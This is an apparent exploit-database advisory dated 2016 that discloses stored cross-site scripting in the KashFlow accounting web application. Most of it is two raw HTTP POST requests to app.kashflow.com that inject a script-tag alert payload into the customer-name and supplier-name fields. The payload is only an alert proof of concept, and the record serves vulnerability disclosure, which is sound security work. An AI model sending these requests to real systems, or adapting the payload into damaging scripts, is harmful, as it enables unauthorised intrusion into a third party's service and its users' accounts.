KashFlow Web Application suffers from a persistent cross site scripting vulnerability.
338cb402ee5e6e927390317c6de151a43ca0725db00590ddcd3dccc9325ecf1f
# Exploit Title: KashFlow Web Application - Multiple Areas of Stored Cross-Site Scripting (XSS)
# Date: 6/24/16
# Exploit Author: Brett DeWall
# Exploit Author Twitter: @xbadbiddyx
# Exploit Author Blog: http://xbadbiddyx.tumblr.com
# Vendor Homepage: https://app.kashflow.com
# Version: Latest commit
# Contacted Vendor Date: 6/18/16
### Vulnerable Area #1
Request
POST /createCustomer.asp HTTP/1.1
Host: app.kashflow.com
custname=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&custcode=SCRI01&custSource=379349&custCountry=GB&inv=0&do=create
### Vulnerable Area #2
Request
POST /createSupplier.asp HTTP/1.1
Host: app.kashflow.com
supname=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&supcode=POST01&do=create